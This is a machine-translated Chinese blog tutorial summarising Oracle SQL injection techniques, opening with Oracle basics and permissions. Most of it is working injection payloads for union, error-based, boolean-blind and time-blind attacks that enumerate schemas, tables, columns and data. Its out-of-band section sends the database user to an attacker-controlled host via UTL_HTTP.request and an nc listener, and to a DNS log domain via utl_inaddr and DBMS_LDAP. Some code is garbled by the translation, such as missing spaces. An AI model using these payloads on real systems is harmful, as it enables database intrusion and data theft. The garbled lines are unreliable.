编程知识 cdmana.com

Oracle SQL injection summary

0x00 Oracle Basics

Oracle Basic use

What is? Oracle database ?

  • Oracle The company is currently one of the largest software providers in the world , Alongside it are Microsoft And Adode. And with Oracle The development of , It has become one of the largest software providers of enterprise office platform .

  • Oracle The database is Oracle ( The Chinese name is Oracle ) The company's core products ,Oracle The database is — A database management system suitable for large and medium-sized enterprises . In all database management systems ( such as : Microsoft SQL Server,IBM Of DB2 etc. ), Oracle Its main users cover a wide range, including banks 、 telecom 、 mobile communication 、 aviation 、 insurance 、 Finance 、 E-commerce and multinational corporations . Oracle The product is free , Can be in Oracle Download the installation package from the official website , On the other hand Oracle The service is charged .

  • The website links :https://www.oracle.com/cn/index.html

Oracle The characteristics of database

  • Complete data management function

  • The amount of data

  • Preservation and persistence of data

  • Database sharing

  • Products with complete relationships

  • Information rules --- Relational type DBMS All the information is logically in one way , That is, the values in the table explicitly represent

  • Criteria for ensuring access

  • View update criteria --- As long as the data in the table forming the view changes , The data in the corresponding view changes at the same time

  • Complete data management function

  • Distributed processing function

  • One ORACLE Distributed database consists of oraclerdbms、sq|Net、 SQLCONNECT And other non ORACLE The composition of relational products

Compared to other databases Oracle Advantages and disadvantages

  • advantage

  • open :Oracle Can run on all mainstream platforms ( Include windows) Fully support all industry standards, adopt a fully open strategy to enable customers to choose suitable solutions, and fully support developers

  • Parallelism :Oracle Parallel server is extended by making group nodes share the same cluster work windowNT Ability to provide cluster solutions with high usability and high scalability

  • Security : Get the highest level of certification ISO Standard certification .

  • performance :Oracle High performance, keep under the open platform TPC-D and TPC-C World Records

  • Use risk :Oracle Long time development experience is fully compatible with low risk of wide application

  • shortcoming

  • Higher requirements for hardware

  • It's more expensive

  • Management and maintenance are troublesome

  • The operation is more complicated , It needs high technology

Oracle Common data types

Sign in Oracle database

Oracle Database basic table management statement

 Create table 
create table  Table name ( Field name   type   constraint )
create table ichunqiu(name char(10) primary key,age int)

 Add column 
alter table  Table name  add( Field name ,  data type )
alter table ichunqiu add(class_name varchar2(200))

 Delete a column in the table 
alter table  Table name  set unused column  Name 
alter table ichunqiu set unused column name

 Modify table fields 
alter table  Table name  modify( Field name   New field type )
alter table ichunqiu modify(name varchar(200))

** Oracle Database basic data operation statement **

** Inquire about ** 
select *| Name | expression  from  Table name  where  Conditions  order by  Name 
select * from ichunqiu order by age desc  ( Descending )
select * from ichunqiu order by age asc   ( Ascending )
select * from ichunqiu order by age       ( The default is ascending )

** Insert ** 
insert into  Table name  values( Corresponding values of all fields )
insert into  Table name  ( Field name 1, Field name 2, Field name 3,...)values( Field corresponding value )
insert into ichunqiu(name,age) values('icq',18)
insert into ichunqiu values('icq',18,'web')

** to update ** 
update  Table name  set  Field name  =  value  where  Update conditions 
update ichunqiu set age=25 where name='icq'

** Delete ** 
delete  Table name  where  Conditions 
delete ichunqiu where name='ii'

  • Truncate

  • grammar :truncate table Table name

  • explain : Delete the data in the table at one time

  • Truncate and delete difference

  1. truncate yes DDL command , Deleted data cannot be recovered ; delete yes DML command , The deleted data can be recovered through the log file of the database

  2. If there are many records in a table , truncate relative delete Fast

Oracle Access control

Oracle Summary of permissions

  • Permissions allow users to access objects or execute programs belonging to other users ,ORACLE The system provides three kinds of permissions : Object Object level 、 System The system level 、Role Role level . These permissions can be granted to users 、 Special users public Or the role , If you grant a permission to a special user "Public" ( user public yes oracle Predefined , Each user has the rights that this user has ) Granted all the permissions to the database .

  • For administrative rights , A character is a tool , Permission can be granted to — A character , A role can also be granted to another role or user . Users can inherit permissions through roles , Role services have no other purpose than administrative rights . Permissions can be granted , You can undo it in the same way

Authority classification

  • Oracle There are two types of permissions in the database
  1. System permissions : The system stipulates the user's right to use the database .( System permissions are for users )

  2. Entity permissions : The access rights of a user to other users' tables or views .( For a table or view )

System permissions ( User authority management )

  • System authority classification

  • DBA: Have all the privileges , It's the highest authority of the system , Only DBA To create a database structure

  • RESOURCE: Have Resource Users with permissions can only create entities , You can't create a database structure

  • CONNECT: Have Connect Users with permissions can only log in Oracle, You cannot create entities , You can't create a database structure

  • For ordinary users : grant connect, resource jurisdiction

  • about DBA Manage users : grant connect, resource,dba jurisdiction

System authority authorization command

  • System permissions can only be created by DBA Users give :sys, system( At the beginning, only these two users )
SQL> grant connect,resource,dba to user name 1[, user name 2]...;

SQL> Create user user50 identified by user50;
SQL> grant connect,resource to user50;

notes : Ordinary users can be authorized to have and system Same user rights , But not with sys Users have the same permissions , system User permissions can also be reclaimed .

Entity permissions ( Table permission management )

  • Entity permission classification

  • select, update, insert, alter, index, delete,all //all Including all permissions

  • execute // Execute stored procedure permissions

  • give an example :

grant select,insert, update on tablename to userA;            -- Empower the user : userA
grant select, insert, update on tablename to public:          -- Empower all users 
grant select, update on product to userA with grant option;   --userA Get access to , And can pass on 
revoke select insert, update on tablename from userA;         -- Revoke the given permission from the user 
userA revoke select, insert, update on tablename from public; -- Revoke the permissions granted from all users 

Be careful : If you cancel the object permission of a user , So for this user, use WITH GRANT OPTION For the user who grants permission , The same permissions will also be removed from these users , That is to say, when the authorization is cancelled, it will be cascaded .

0x01 Common injection types

Introduce knowledge

  • Oracle Medium dual Table introduction

  • This watch is Oracle One of the databases Self contained Watch , It is to satisfy Query criteria And produce

  • dual Features of the watch

  1. dual yes oracle Pseudo table in ( Only one row and one column )

  2. Every user can use

  3. Probably dual The table was deleted ,sys Can recover

  • stay oracle The query statement used in must be followed by a table name , as follows :

  • Mysql:union select 1, 2, 3

  • Oracle:union select 1, 2, 3 from dual

  • Oracle Introduction to the annotation of

  • The single line comment symbol is :--

  • Multiline comment symbols are ://**

  • Oracle Of Strong matching type

  • stay Oracle Carry out similar UNION When querying data, the data type at the corresponding position must be consistent with the data type of the column in the table , You can also use null Instead of some locations where data types cannot be guessed quickly

  • give an example :

  • mysql::union select 1, 2, 3

  • oracle:union select null, null, null from dual

union Joint query injection

Oracle union The basic process of joint query injection

**1. Determine whether there is injection ** 
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1'

**2. Determine the number of fields ** 
 The current watch has 4 A field 
id=1 order by 4--   

**3. Joint query to retrieve the display ** 
Oracle  Database query needs  from dual ( Virtual table / False watch )  A table set specifically for query statements 
union select * from dual--
id=1 union select 1,2,3,4 from dual--
null Replace all types 
id=1 union select null,null,null,null from dual--
id=1 union select 1,'admin',3,4 from dual--

**4. Query database version 、 Database connection user 、 The current instance name ** 
id=1 union select 1,(select banner from sys.v_$version where rownum=1),3,4 from dual--
id=1 union select 1,(select SYS_CONTEXT('USERENV','CURRENT_USER') from dual),3,4 from dual-- #test
id=-1 union select 1,(select instance_name from v$instance),3,4 from dual--

**5. Traverse the database name ** 
id=-1 union select 1,(select owner from all_tables where rownum=1),3,4 from DUAL--
id=-1 union select 1,(select owner from all_tables where rownum=1 and owner not in ('SYS')),3,4 from DUAL--
id=-1 union select 1,(select owner from all_tables where rownum=1 and owner not in('SYS','OUTLN','SYSTEM')),3,4 from DUAL--

**6. Traversal table name ** 
id=-1 union select 1,(select table_name from user_tables where rownum=1 and table_name not in ('ADMIN1','DEMO','FLAG','ICHUNQIU','STU')),3,4 from DUAL--

**7. Traverse flag Table field name ** 
id=-1 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name='FLAG' AND column_name not in ('id','name','pwd','flag')),3,4 from DUAL--

**8. Query table field data ** 
id=-1 union select 1,(select NAME||AGE FROM DEMO where rownum=1),3,4 from dual--
id=-1 union select 1,(select "name"||"age" FROM DEMO where rownum=1),3,4 from dual--
id=-1 union select 1,(select 'username:'||NAME||'age:'||AGE FROM DEMO where rownum=1),3,4 from dual--

error Inject

Common error display functions

  1. dbms_xdb_version.checkin() function
  • Belong to dbms_xdb_version Under the checkin function . This function checks in and out VCR And return the newly created version of the resource ID.

  • payload:

and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null--
  1. dbms_xdb_version.uncheckout() function
  • Usage and checkin Agreement

  • payload:

and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null--
  1. **utl_inaddr.get_host_name() ** function
  • explain : This method Oracle 8g,9g,10g No permissions are required in , But in ** Oracle 11g And later ** , Officials have strengthened access control , So in 11g This method will be used for error injection in the future , The current database user must have Network access

  • Error reporting method : obtain ip Address , If its parameters cannot be parsed, an error will be reported , Displays the parameters passed . If its parameter is a SQL sentence , Then the error report will show the result .

  • payload:

and utl_inaddr.get_host_name((select user from dual))=1--

Other commonly used error display functions

Function name payload
dbms_xdb_version.makeversioned() and (select dbms_xdb_version.makeversioned ((select user from dual)) from dual) is not null--
dbms_utility.sqlid_to_sqlhash() and (select dbms_utility.sqlid_to_sqlhash ((select user from dual)) from dual) is not null--
ordsys.ord_dicom.getmappingxpath() and select ordsys.ord_dicom.getmappingxpath ((select user from dual),user,user) =1--
ctxsys.drithsx.sn() and (select ctxsys.drithsx.sn ((select user from dual)) from dual) =1--

Oracle error Injection basic process

**1. Determine whether there is injection ** 
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1'

2.** Query database version 、 Database connection user 、 The current instance name ** 
id=1 and dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select SYS_CONTEXT('USERENV','CURRENT_USER') from dual)) is not null--
id=1 and dbms_xdb_version.checkin((select instance_name from v$instance)) is not null--

2.** Traverse to get the database name ** 
id=1 and dbms_xdb_version.checkin((select owner from all_tables where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select owner from all_tables where rownum=1 and owner not in ('SYS'))) is not null--

3.** Traverse to get the table name ** 
id=1 and dbms_xdb_version.checkin((select table_name from user_tables where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select table_name from user_tables where rownum=1 and table_name not in ('ADMIN1','DEMO'))) is not null--

**4. Traverse to get the field name ** 
id=1 and dbms_xdb_version.checkin((select column_name from user_tab_columns where rownum=1 and table_name='FLAG' AND column_name not in ('id','name','pwd','flag'))) is not null--

5.** Query table field data ** 
id=1 and dbms_xdb_version.checkin((select NAME||AGE FROM DEMO where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select "name"||"age" FROM DEMO where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select 'username:'||NAME||'age:'||AGE FROM DEMO where rownum=1)) is not null--

bool Blind note

bool Blind correlation function

  1. decode() ** function **
  • usage :decode( Conditions , value 1, Translation value 1, value 2, Translation value 2… value n, Translation value n, The default value )

  • meaning :if( Conditions == value 1) -> Returns the translation value 1, Otherwise, return the default value

  • give an example : Inquire about Oracle edition , Judge whether the first character of the version string is O

  • Payload :

and1=(select decode(substr((select banner from sys.v_$Version where rownum=1),1,1), 'O', 1, 0) from dual--
  • explain : among select Statements can replace , Such as :

  • Get the current user : selectuser from dual;

  • Get character length : select length(user) from dual;

  1. instr() ** function **
  • usage :instr( string1, string2 ) / instr( The source string , Target character )

  • meaning : Search for the specified character and return the position where the specified character is found , string1 Is the searched string , string2 Is the string you want to search

  • Injection idea : instr Returns the ’SQL’ The position of the location data in the query results , If not found, return 0, Can be based on ‘SQL′ Position traversal and iteration , Get data

  • give an example : Query the current user , Determine whether the first character of the user name is T

  • Payload

and1=(instr((select user from dual),'T'))--

Oracle bool Basic process of blind injection

**1. Judgment injection ** 
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1'

2.** Query database version / user ** 
decode decode(substr(('abc'),1,1),'a',1,0)
length  Return string length 
ascii   Return character's ascii code 
instr   Whether the search results contain keywords   There is returned 1  Otherwise return to 0
id=1 and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual)--
id=1 and (select length(user) from dual)=4-- 
id=1 and (select ascii('a') from dual)=97-- 
id=1 and (select ascii(substr((select user from dual),1,1)) from dual)=84-- #ascii Code judgment character  T
id=1 and (select ascii(substr((select user from dual),2,1)) from dual)=69-- #ascii Code judgment character  E

id=1 and 1=(instr((select user from dual),'T'))--
id=1 and 1=(instr((select user from dual),'TE'))--
id=1 and 1=(instr((select user from dual),'TES'))--
id=1 and 1=(instr((select user from dual),'TEST'))--

**3. Get library name ** 
id=1 and (select length(owner) from all_tables where rownum=1)=3-- # The length of the first library name is 3
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),1,1)) from dual)=83--
#ascii by 83 S
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),2,1)) from dual)=89--
#ascii by 89 Y
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),3,1)) from dual)=83--
#ascii by 83 S

**4. Get table name ** 
id=1 and (select ascii(substr((select table_name from user_tables where rownum=1),1,1)) from dual)=105--  The first character of the first table name is i
id=1 and (select ascii(substr((select table_name from user_tables where rownum=1),2,1)) from dual)=99--  The second character of the first table name is c

**5. Get field name ** 
id=1 and (select ascii(substr((select column_name from user_tab_columns where rownum=1 and table_name='icq'),1,1)) from dual)=117-- icq The first character of the first field in the table u
id=1 and (select ascii(substr((select column_name from user_tab_columns where rownum=1 and table_name='icq'),2,1)) from dual)=115-- icq The second character of the first field in the table s

time Blind note

time Blind correlation function

  • DBMS_PIPE.RECEIVE_MESSAGE() ** function **

  • usage :DBMS_PIPE.RECEIVE_MESSAGE(' Any value ', Delay time )

  • give an example :DBMS_PIPE.RECEIVE_MESSAGE('ICQ',5) From ICQ The data returned by the pipeline needs to wait 5 second

  • payload

and DBMS_PIPE.RECEIVE_MESSAGE('ICQ',5)=1

Commonly used payload

id=1 and dbms_pipe.receive_message((), 5)=1
id=1 and (select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O', dbms_pipe.receive_message('ICQ', 5),0) from dual)=1--
 The first character of the intercepted database version is O Just delay 5s
id=1 and (select decode(length(user),4,dbms_pipe.receive_message('ICQ', 5),0) from dual)=1--
 The length of the user name is 4  Just delay 5s

Out of band injection

Oracle Out of band injection

  • Oracle Out of band injection and DNSLOG Very similar , need Functions that use network requests Injection and utilization , The functions that can make network requests are as follows

Out of band injection correlation function

  • utl_http.request() ** function **

  • Function description : stay Oracle Provided in utlhttprequest function , Used to obtain web Server request information , therefore , An attacker can listen on the port itself , Then send the required data with a request through this function

  • UTL_HTTP Package introduction : Provide for the right to HTTP Some operations of .

  • give an example : Implement this SQL sentence , Will return baidu. com Of HTML Source code

select UTL_HTTP.REQUEST('http://www.baidu.com') from dual
  • utl_inaddr.get_host_address() function

  • Commonly used payload

and (selectutl_inaddr.get_host_address((select user from dual)||'.aaa.com( Build yourself dnslog)') from dual)is not null --
  • SYS.DBMS_LDAP.INIT()

  • Commonly used payload

and (select SYS.DBMS_LDAP.INIT((select userfrom dual)||'.aaaa.com( Build yourself dnslog)') from dual)is notnull --

Out of band injection process

  1. Judge UTL_HTTP Whether the stored procedure is available
  • Submit the following query at the injection point :
select count(*) from allobjects where object name='UTL_HTTP'
  • Judge by page echo UTL_HTTP Is it available , If the page returns to normal , shows UTL_HTTP Stored procedures are available
  1. Use NC Monitor data
  • For local use nc Listening on a port , The local host is required to have an external network ip Address

  • nc-lvvp Listening port

  1. Bounce data information
  • Submit at the injection point :
#  Send a request , Get current user name 
id=1 and UTL_HTTP.request('http://ip: Listening port /'||(select user from dual))=1--

Injection attack can be realized

Be careful : Submit a request at the injection point every time ,nc After listening, it will disconnect , Reboot required nc monitor

Commonly used payload

#  Judge utl_http Is it available 
id=1 and exists (select count(*) from all_objects where object_name='UTL_HTTP')--
id=1 and (select count(*) from all_objects where object_name='UTL_HTTP')>1--
id=1 union select 1,null,3,(select count(*) from all_objects where object_name='UTL_HTTP') from dual-- 

#  Send a request , Get current user name 
id=1 and UTL_HTTP.request('http://ip: Listening port /'||(select user from dual))=1--

版权声明
本文为[FreeKnight]所创,转载请带上原文链接,感谢
https://cdmana.com/2021/11/20211109094145412T.html

Scroll to Top